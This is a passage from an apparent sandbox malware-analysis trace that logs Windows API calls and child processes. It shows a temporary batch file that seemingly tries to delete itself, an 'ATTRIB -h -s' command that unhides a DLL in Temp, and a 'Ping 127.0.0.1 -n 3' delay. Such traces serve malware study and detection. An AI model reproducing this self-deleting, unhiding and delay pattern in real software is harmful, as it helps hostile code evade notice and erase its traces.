GetLastError () returned 0x2 [0053.479] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\%0", fInfoLevelId=0x0, lpFindFileData=0x4107fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4107fc) returned 0xffffffff [0053.479] GetLastError () returned 0x2 [0053.479] _get_osfhandle (_FileHandle=2) returned 0xb [0053.479] GetFileType (hFile=0xb) returned 0x2 [0053.479] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0053.479] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24eb64 | out: lpMode=0x24eb64) returned 1 [0053.480] _get_osfhandle (_FileHandle=2) returned 0xb [0053.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24eb98 | out: lpConsoleScreenBufferInfo=0x24eb98) returned 1 [0053.480] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x49e84640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0053.480] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x49e84640, nSize=0x2000, Arguments=0x24ebd8 | out: lpBuffer="Could Not Find C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\%0\r\n") returned 0x34 [0053.480] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24ebbc, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24ebbc*=0x34) returned 1 [0053.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.481] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.481] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.481] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.481] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.481] SetConsoleInputExeNameW () returned 0x1 [0053.481] GetConsoleOutputCP () returned 0x1b5 [0053.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.481] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.481] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0053.481] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0053.481] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.481] SetFilePointer (in: hFile=0x54, lDistanceToMove=245, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.482] ReadFile (in: hFile=0x54, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0x0, lpOverlapped=0x0) returned 1 [0053.482] GetLastError () returned 0x0 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] GetFileType (hFile=0x54) returned 0x1 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.482] ReadFile (in: hFile=0x54, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f4ec, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f4ec*=0x0, lpOverlapped=0x0) returned 1 [0053.482] GetLastError () returned 0x0 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] GetFileType (hFile=0x54) returned 0x1 [0053.482] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.482] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.482] longjmp () [0053.482] _tell (_FileHandle=3) returned 245 [0053.482] _close (_FileHandle=3) returned 0 [0053.482] CmdBatNotification () returned 0x0 [0053.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.483] SetConsoleInputExeNameW () returned 0x1 [0053.483] GetConsoleOutputCP () returned 0x1b5 [0053.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.483] exit (_Code=0) Process: id = "24" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7eef7620" os_pid = "0xce0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0xcc4" cmd_line = "ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1440 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1441 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1442 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1443 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1444 start_va = 0x730000 end_va = 0x736fff entry_point = 0x730000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 1445 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1446 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1448 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1449 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1452 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1453 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1454 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1455 start_va = 0x6ebc0000 end_va = 0x6ebdcfff entry_point = 0x6ebc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1456 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1457 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1458 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1459 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1460 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1461 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1462 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1463 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1464 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1465 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1466 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1467 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1468 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1469 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Thread: id = 168 os_tid = 0xce4 Process: id = "25" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7eef7620" os_pid = "0xce8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0xcc4" cmd_line = "Ping 127.0.0.1 -n 3" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1470 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1471 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1472 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1473 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1474 start_va = 0xf30000 end_va = 0xf37fff entry_point = 0xf30000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1475 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1476 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1477 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1478 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1479 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1480 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1481 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1482 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1483 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1484 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1485 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1486 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1487 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1488 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1489 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1490 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1491 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1492 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1493 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1494 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1495 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1496 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1497 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1498 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1499 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1500 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1501 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1502 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1503 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1504 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1505 start_va = 0x1f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1506 start_va = 0x400000 end_va = 0x402fff entry_point = 0x400000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1507 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1508 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1509 start_va = 0xf40000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1510 start_va = 0x5c0000 end_va = 0x88efff entry_point = 0x5c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1511 start_va = 0x8e0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 1512 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1513 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1514 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1515 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1516 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1517 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e3145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1518 start_va = 0x990000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1519 start_va = 0x71f20000 end_va = 0x71f25fff entry_point = 0x71f20000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1520 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1521 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75271673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Thread: id = 169 os_tid = 0xcec [0051.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efddc | out: lpSystemTimeAsFileTime=0x1efddc*(dwLowDateTime=0x4fdc38e0, dwHighDateTime=0x1d34280)) [0051.313] GetCurrentProcessId () returned 0xce8 [0051.313] GetCurrentThreadId () returned 0xcec [0051.313] GetTickCount () returned 0x149bc [0051.313] QueryPerformanceCounter (in: lpPerformanceCount=0x1efdd4 | out: lpPerformanceCount=0x1efdd4*=327846611) returned 1 [0051.321] GetModuleHandleA (lpModuleName=0x0) returned 0xf30000 [0051.321] __set_app_type (_Type=0x1) [0051.321] __p__fmode () returned 0x768231f4 [0051.321] __p__commode () returned 0x768231fc [0051.321] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf32ae1) returned 0x0 [0051.321] __getmainargs (in: _Argc=0xf350d4, _Argv=0xf350dc, _Env=0xf350d8, _DoWildCard=0, _StartInfo=0xf350e8 | out: _Argc=0xf350d4, _Argv=0xf350dc, _Env=0xf350d8) returned 0 [0051.321] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.321] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0051.321] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xf35440 | out: lpWSAData=0xf35440) returned 0 [0051.327] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef86c | out: phkResult=0x1ef86c*=0x58) returned 0x0 [0051.327] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x1ef860, lpData=0x1ef868, lpcbData=0x1ef864*=0x4 | out: lpType=0x1ef860*=0x0, lpData=0x1ef868*=0x0, lpcbData=0x1ef864*=0x4) returned 0x2 [0051.327] RegCloseKey (hKey=0x58) returned 0x0 [0051.327] getaddrinfo (in: pNodeName="127.0.0.1", pServiceName=0x0, pHints=0x1ef834*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1ef85c | out: ppResult=0x1ef85c*=0x312ff0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x30e258*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0051.327] FreeAddrInfoW (pAddrInfo=0x312ff0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x30e258*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0051.327] IcmpCreateFile () returned 0x321e28 [0051.333] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x32c7d0 [0051.333] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x32cfb8 [0051.335] getnameinfo (in: pSockaddr=0xf355e0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x1efd5c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0051.350] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="àV2") returned 0x14 [0051.351] CharToOemBuffA (in: lpszSrc="\r\nPinging 127.0.0.1 ", lpszDst=0x3256e0, cchDstLength=0x14 | out: lpszDst="\r\nPinging 127.0.0.1 ") returned 1 [0051.351] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.351] _write (in: _FileHandle=1, _Buf=0x3256e0*, _MaxCharCount=0x14 | out: _Buf=0x3256e0*) returned 20 [0051.351] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.351] LocalFree (hMem=0x3256e0) returned 0x0 [0051.351] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="(Ê2") returned 0x18 [0051.351] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x32ca28, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0051.351] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.351] _write (in: _FileHandle=1, _Buf=0x32ca28*, _MaxCharCount=0x18 | out: _Buf=0x32ca28*) returned 24 [0051.351] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.351] LocalFree (hMem=0x32ca28) returned 0x0 [0051.351] SetConsoleCtrlHandler (HandlerRoutine=0xf317ca, Add=1) returned 1 [0051.351] IcmpSendEcho2Ex (in: IcmpHandle=0x321e28, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c7d0, RequestSize=0x20, RequestOptions=0x1ef888, ReplyBuffer=0x32cfb8, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x32cfb8) returned 0x1 [0051.353] inet_ntoa (in=0x100007f) returned="127.0.0.1" [0051.353] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="àV2") returned 0x16 [0051.353] CharToOemBuffA (in: lpszSrc="Reply from 127.0.0.1: ", lpszDst=0x3256e0, cchDstLength=0x16 | out: lpszDst="Reply from 127.0.0.1: ") returned 1 [0051.353] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0051.353] _write (in: _FileHandle=1, _Buf=0x3256e0*, _MaxCharCount=0x16 | out: _Buf=0x3256e0*) returned 22 [0051.353] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0051.353] LocalFree (hMem=0x3256e0) returned 0x0 [0051.353] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1ef860, nSize=0x0, Arguments=0x1ef85c | out: lpBuffer="xñ2") returned 0x9 [0051.353] CharToOemBuffA (in: 